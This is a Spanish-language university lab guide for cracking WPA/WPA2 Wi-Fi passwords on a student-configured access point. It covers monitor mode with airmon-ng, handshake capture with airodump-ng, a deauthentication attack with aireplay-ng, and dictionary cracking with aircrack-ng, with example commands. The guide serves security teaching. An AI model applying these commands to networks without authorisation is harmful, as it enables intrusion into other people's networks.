Вы находитесь на странице: 1из 6

Cracking WPA - WPA2

Objetivos:

 Verificar el funcionamiento de WPA y WPA2

 Corroborar la importancia de manejar claves fuertes cuando se


emplean sistemas de protección como WPA y WPA2

Requerimientos

 Kali o Backtrack
 Access Point
 Equipo con tarjeta de red inalámbrica

Convenciones
Consejo
Información
Advertencia
Tarea
Ejecución en una Terminal de Linux o Windows

Se debe redactar un informe de laboratorio que contenga los resultados de la


práctica y las respuestas a las preguntas que aparecen en la guía. Algunas
de las preguntas podrían requerir de investigación adicional a la práctica. El
informe debe ser entregado en la siguiente práctica de laboratorio.

Cracking WPA - WPA2 Página 1


CRACKING WPA

Pasos previos

1. Configure el AP, habilitando seguridad WPA2-TKIP. Utilice una palabra


sencilla de diccionario como contraseña.

2. Configure un cliente para que acceda a su red inalámbrica y verifique la


conexión a la red que acabó de configurar. Verifique conectividad
haciendo Ping extendido al AP ejecutando:

Ping Dirección_IP_del_AP

3. Verifique que el grupo de la red objetivo haya terminado su


configuración para poder iniciar el ataque.

4. Inicie kali linux. Verifique que el sistema haya detectado su interfaz de


red inalámbrica:

iwconfig

Cracking WPA - WPA2 Página 2


iwconfig le permitirá no solo verificar si la interfaz de red inalámbrica
ha sido detectada, sino que también le permitirá usar la red
inalámbrica para detectar las redes disponibles en su área de
cobertura:

iwlist wlan0 scanning > redeswifi.txt

more redeswifi.txt

5. Identifique la red que usted desea atacar en el archivo anterior y


analice la información. Tenga en cuenta los siguientes datos:
a. ¿Cuál es la MAC del AP? (BSSID)
b. ¿Cuál es el nombre de la red wifi? (SSID o ESSID)
c. ¿Por cual canal está transmitiendo la red objetivo?

Cracking WPA - WPA2 Página 3


6. Debemos crear una tarjeta virtual que trabaje como interfaz monitor.
Para ello se debe ejecutar:

airmon-ng start wlan0

Ahora ejecute ifconfig para identificar el nombre con que fue creado el
monitor:

ifconfig

Nota: podrá aparecer una tarjeta virtual llamada mon0 ó wlan0mon

7. En una consola, ejecute:

Cracking WPA - WPA2 Página 4


airodump-ng --channel 11 --bssid <MAC_AP> --write captura
wlan0mon

NOTA: Los valores resaltados deben ser modificados por los que usted ha
conseguido de la red objetivo

EJEMPLO:
airodump-ng --channel 6 --bssid 40:5B:7A:0D:51:11 --write
captura wlan0mon

Identifique la MAC del ciente que se encuentre conectado con la red


objetivo

MAC del AP (BSSID) MAC del cliente

8. Ahora, trataremos de lanzar un ataque de desautenticación para


intentar capturar el handshake (momento en que el cliente se
autentica con el AP) para obtener el hash de la contraseña:

aireplay-ng -0 1 -a BSSID -c MAC_cliente t.red

Cracking WPA - WPA2 Página 5


Ejemplo:
aireplay-ng -0 1 -a 00:18:39:7A:78:18 -c 00:26:C6:92:9B:A2
mon0

9. Si hemos tenido éxito en la desautenticación, seguramente tendremos


el hash en nuestro archivo de capturas.

10. Utilice el archivo de contraseñas que le indique el profesor. Abra


una terminal y ejecute:

Aircrack-ng –w diccionario.lst capturaWPA.cap

NOTA: Valide los datos resaltados


Si la clave de la red atacada coincide con alguna del diccionario, aircrack-ng
nos dirá cual es.

En caso de requerir ataque de fuerza bruta, podemos recurrir a John the


ripper.

Cracking WPA - WPA2 Página 6